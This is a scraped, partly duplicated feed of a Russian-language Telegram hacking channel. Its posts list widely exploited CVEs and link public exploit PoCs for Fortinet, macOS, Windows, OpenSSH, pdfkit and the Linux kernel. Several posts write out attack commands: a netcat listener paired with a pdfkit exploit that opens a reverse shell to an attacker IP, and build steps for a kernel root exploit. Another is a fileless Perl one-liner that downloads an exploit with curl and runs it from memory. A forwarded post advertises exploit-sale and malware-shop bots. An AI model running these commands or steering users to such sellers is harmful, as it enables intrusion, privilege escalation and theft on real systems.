Топ 15 более используемых уязвимостей в 2к22:
1. Log4Shell (CVE-2021-44228)
2. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
3. ProxyShell (CVE-2021-31207
4. CVE-2021-34473
5. CVE-2021-34523)
6–9. ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
10. Server/Data Center Atlassian Confluence (CVE-2021-26084)
11. Уязвимость VMware vSphere (CVE-2021-21972)
12. ZeroLogon (CVE-2020-1472)
13. Сервер Microsoft Exchange (CVE-2020-0688)
14. Pulse Secure Pulse Connect Secure (CVE-2019-11510)
15. Fortinet FortiOS и FortiProxy (CVE-2018-13379)
Подробнее: тык
#новости #CVE
1. Log4Shell (CVE-2021-44228)
2. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
3. ProxyShell (CVE-2021-31207
4. CVE-2021-34473
5. CVE-2021-34523)
6–9. ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
10. Server/Data Center Atlassian Confluence (CVE-2021-26084)
11. Уязвимость VMware vSphere (CVE-2021-21972)
12. ZeroLogon (CVE-2020-1472)
13. Сервер Microsoft Exchange (CVE-2020-0688)
14. Pulse Secure Pulse Connect Secure (CVE-2019-11510)
15. Fortinet FortiOS и FortiProxy (CVE-2018-13379)
Подробнее: тык
#новости #CVE
На досуге можно заняться полезным делом и, например, потрениться/поучиться навыкам взлома благодаря Metasploitable
Но для него нужен Virtual Box:
Теперь давайте установим сам Metasploitable:
https://sourceforge.net/projects/metasploitable/
Далее закидываем соответствующий файл в VB и наслаждаемся)
P.S. если нужна будет помощь в установке- милости прошу в комментарии
#полезные_материалы #CVE #новости
Но для него нужен Virtual Box:
apt-get install virtualbox-dkms
virtualbox
*На винде он тоже есть*Теперь давайте установим сам Metasploitable:
https://sourceforge.net/projects/metasploitable/
Далее закидываем соответствующий файл в VB и наслаждаемся)
P.S. если нужна будет помощь в установке- милости прошу в комментарии
#полезные_материалы #CVE #новости
PoC для уязвимости CVE-2022-40684 (Fortinet RCE)
Данная уязвимость затрагивает брандмауэры FortiGate, веб-прокси FortiProxy, а также FortiSwitch Manager и оценивается в 9,6 балла из 10 возможных по шкале CVSS. Позволяет осуществить полный обход аутентификации.
Подробнее: тык
#CVE
Данная уязвимость затрагивает брандмауэры FortiGate, веб-прокси FortiProxy, а также FortiSwitch Manager и оценивается в 9,6 балла из 10 возможных по шкале CVSS. Позволяет осуществить полный обход аутентификации.
Подробнее: тык
#CVE
GitHub
GitHub - carlosevieira/CVE-2022-40684: PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only) - carlosevieira/CVE-2022-40684
MacDirtyCowDem
Получаем root в macOS 13.0.1 через CVE-2022-46689
Подробнее: https://github.com/zhuowei/MacDirtyCowDemo
#CVE
Получаем root в macOS 13.0.1 через CVE-2022-46689
Подробнее: https://github.com/zhuowei/MacDirtyCowDemo
#CVE
Теперь на канале настроена удобная навигация по категориям постов, которые будут находиться в этом закрепленном сообщении и описании канала🔥
#райтап
#hack_the_box
#новости
#CVE
#полезные_материалы
#литература
#софт
#termux
#райтап
#hack_the_box
#новости
#CVE
#полезные_материалы
#литература
#софт
#termux
CVE-2023-21752 aka уязвимость удаления произвольного файла в службе резервного копирования Windows
Уязвимость, обнаруженная в службе резервного копирования Windows 10 января 2023 года, позволяет провести эскалацию привилегий user до system
Этот репозиторий содержит два эксплойта:
1. Удаление файла на выбор
2. Злоупотребление удалением произвольной формы, чтобы создать оболочку cmd с повышенными правами
Демонстрация уязвимости: https://github.com/Wh04m1001/CVE-2023-21752
Об уязвимости: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752
#CVE #полезные_материалы
Уязвимость, обнаруженная в службе резервного копирования Windows 10 января 2023 года, позволяет провести эскалацию привилегий user до system
Этот репозиторий содержит два эксплойта:
1. Удаление файла на выбор
2. Злоупотребление удалением произвольной формы, чтобы создать оболочку cmd с повышенными правами
Демонстрация уязвимости: https://github.com/Wh04m1001/CVE-2023-21752
Об уязвимости: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752
#CVE #полезные_материалы
GitHub
GitHub - Wh04m1001/CVE-2023-21752
Contribute to Wh04m1001/CVE-2023-21752 development by creating an account on GitHub.
Общедоступная коллекция CVE и эксплойтов в студию🔥
Во вкладках с некоторыми эксплойтами есть how to use для самых маленьких😁
https://github.com/jhftss/POC
#CVE #полезные_материалы
Во вкладках с некоторыми эксплойтами есть how to use для самых маленьких😁
https://github.com/jhftss/POC
#CVE #полезные_материалы
GitHub
GitHub - jhftss/POC: A public collection of POCs & Exploits for the vulnerabilities I discovered
A public collection of POCs & Exploits for the vulnerabilities I discovered - jhftss/POC
Гигантская коллекция почти каждого общедоступного CVE PoC
Подробнее: https://github.com/trickest/cve
#CVE #полезные_материалы #литература
Подробнее: https://github.com/trickest/cve
#CVE #полезные_материалы #литература
GitHub
GitHub - trickest/cve: Gather and update all available and newest CVEs with their PoC.
Gather and update all available and newest CVEs with their PoC. - trickest/cve
CVE-2023-25136 Proof-of-Concept
DoS-доказательство концепции двойного освобождения OpenSSH 9.1p1 CVE-2023-25136.
Это вызовет двойное освобождение и приведет к аварийному завершению
Подробнее: https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
#CVE
DoS-доказательство концепции двойного освобождения OpenSSH 9.1p1 CVE-2023-25136.
Это вызовет двойное освобождение и приведет к аварийному завершению
Подробнее: https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
#CVE
GitHub
GitHub - jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
Contribute to jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free development by creating an account on GitHub.
PDFkit-CMD-Injection (CVE-2022-25765)
Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6
Использование:
Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)
Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6
Использование:
nc -lvnp 1337
./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)
Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
GitHub
GitHub - nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 - nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE
➡️ Github PoC
🌚 @poxek
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
perl -e '
require qw/syscall.ph/;
my $fd = syscall(SYS_memfd_create(), $fn, 0);
system "curl https://example.com/exploit -s >&$fd";
exec {"/proc/$$/fd/$fd"} "memfd";
'
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Exploit Service
Proof of Concept (PoC) for #CVE-2024-23334, demonstrating how #malicious actors can exploit vulnerabilities in aiohttp using #LFI .
https://github.com/jhonnybonny/CVE-2024-23334
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
https://github.com/jhonnybonny/CVE-2024-23334
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
GitHub
GitHub - jhonnybonny/CVE-2024-23334: aiohttp LFI (CVE-2024-23334)
aiohttp LFI (CVE-2024-23334). Contribute to jhonnybonny/CVE-2024-23334 development by creating an account on GitHub.